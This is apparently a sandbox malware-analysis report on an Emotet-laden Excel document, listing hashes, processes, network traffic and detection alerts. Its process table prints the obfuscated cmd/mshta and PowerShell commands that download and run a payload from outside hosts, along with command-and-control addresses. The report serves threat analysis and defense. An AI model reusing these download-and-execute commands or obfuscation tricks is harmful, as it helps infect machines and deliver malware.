File name: | ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls |
Full analysis: | https://app.any.run/tasks/fa0ab44b-a0d2-4bf4-b5e5-01f8124cd501 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 24, 2022, 18:36:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0 |
MD5: | 3F7F1F6050609317474B8F48EFA00E88 |
SHA1: | C95BFBC3794A4371D3B5A6702052D662DEE19A15 |
SHA256: | ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70 |
SSDEEP: | 1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr |
.xls | | | Microsoft Excel sheet (78.9) |
---|
HeadingPairs: |
|
---|---|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
ModifyDate: | 2022:01:20 19:07:37 |
CreateDate: | 2022:01:20 19:00:43 |
Software: | Microsoft Excel |
LastModifiedBy: | xXx |
Author: | xXx |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2864 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3888 | cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3300 | mshta http://0xb907d607/fer/fe2.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2868 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
592 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2532 | cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2504 | mshta http://0xb907d607/fer/fe2.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3564 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3336 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\system32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Exit code: 0 Version: 7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211) | ||||
2512 | "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2864 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3435.tmp.cvr | — | |
MD5:— | SHA256:— | |||
592 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR5C10.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2864 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNK | lnk | |
MD5:7464406E83C45F0F70623CA831B9BD1F | SHA256:0BA02DB2AA7C58019DDB77133FDC841390D2605DB85E7422C268F6D86D4D690D | |||
592 | EXCEL.EXE | C:\Users\admin\Desktop\C9991000 | document | |
MD5:5DEF2339D666CE59F90BC5D140C8D932 | SHA256:431B7E16DC3DBB787FC351C000C11F4679CF5B2D8B9A69E7BDB87BCFAADCFE2C | |||
3300 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe2[1].htm | binary | |
MD5:9F303AED27F68A19797E11246A1EDE5B | SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B | |||
2864 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:105A209345F69A8DF243BCB9A739ABC2 | SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9 | |||
2868 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:D3C284009A5790C3AA90D7C5D620CA65 | SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39 | |||
2864 | EXCEL.EXE | C:\Users\admin\Desktop\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls | document | |
MD5:13707C4B8129D8E1FE6B1A1611E47339 | SHA256:45AA2BE6FE26C047606F732E43B1500B490CA6CABFE82740C00B13C9AAD257FA | |||
592 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFF9BB75E30745DBEE.TMP | atn | |
MD5:CDFB84B601CD88D28A25B871ABD3BEC1 | SHA256:DEA75B3664ECD4E1AA6329704610C7712C90633D8BF552F00724A2FF372C4C3E | |||
2504 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\fe2[1].htm | binary | |
MD5:9F303AED27F68A19797E11246A1EDE5B | SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2504 | mshta.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.html | FR | binary | 10.8 Kb | malicious |
2868 | powershell.exe | GET | 200 | 104.21.82.47:80 | http://hindimedia.in/wp-content/uploads/iXntuGFqLE31oHsTk/ | US | executable | 612 Kb | suspicious |
3300 | mshta.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.html | FR | binary | 10.8 Kb | malicious |
3564 | powershell.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.png | FR | text | 1011 b | malicious |
2868 | powershell.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.png | FR | text | 1011 b | malicious |
1264 | rundll32.exe | GET | 200 | 13.107.4.50:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5563e4366c123fe3 | US | compressed | 4.70 Kb | whitelisted |
1264 | rundll32.exe | GET | 200 | 13.107.4.50:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1d81fbf8ae884c13 | US | compressed | 59.9 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1264 | rundll32.exe | 103.8.26.103:8080 | — | SKSA TECHNOLOGY SDN BHD | MY | malicious |
3300 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
2868 | powershell.exe | 104.21.82.47:80 | hindimedia.in | Cloudflare Inc | US | suspicious |
3564 | powershell.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
1264 | rundll32.exe | 131.100.24.231:80 | — | GOPLEX TELECOMUNICACOES E INTERNET LTDA - ME | BR | malicious |
2868 | powershell.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
2504 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
1264 | rundll32.exe | 209.59.138.75:7080 | — | Liquid Web, L.L.C | US | malicious |
1264 | rundll32.exe | 13.107.4.50:80 | ctldl.windowsupdate.com | Microsoft Corporation | US | whitelisted |
1264 | rundll32.exe | 51.38.71.0:443 | — | — | GB | malicious |
Domain | IP | Reputation |
---|---|---|
hindimedia.in |
| suspicious |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2868 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2868 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2868 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 5 |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 14 |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 3 |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 19 |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 9 |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 18 |
1264 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 17 |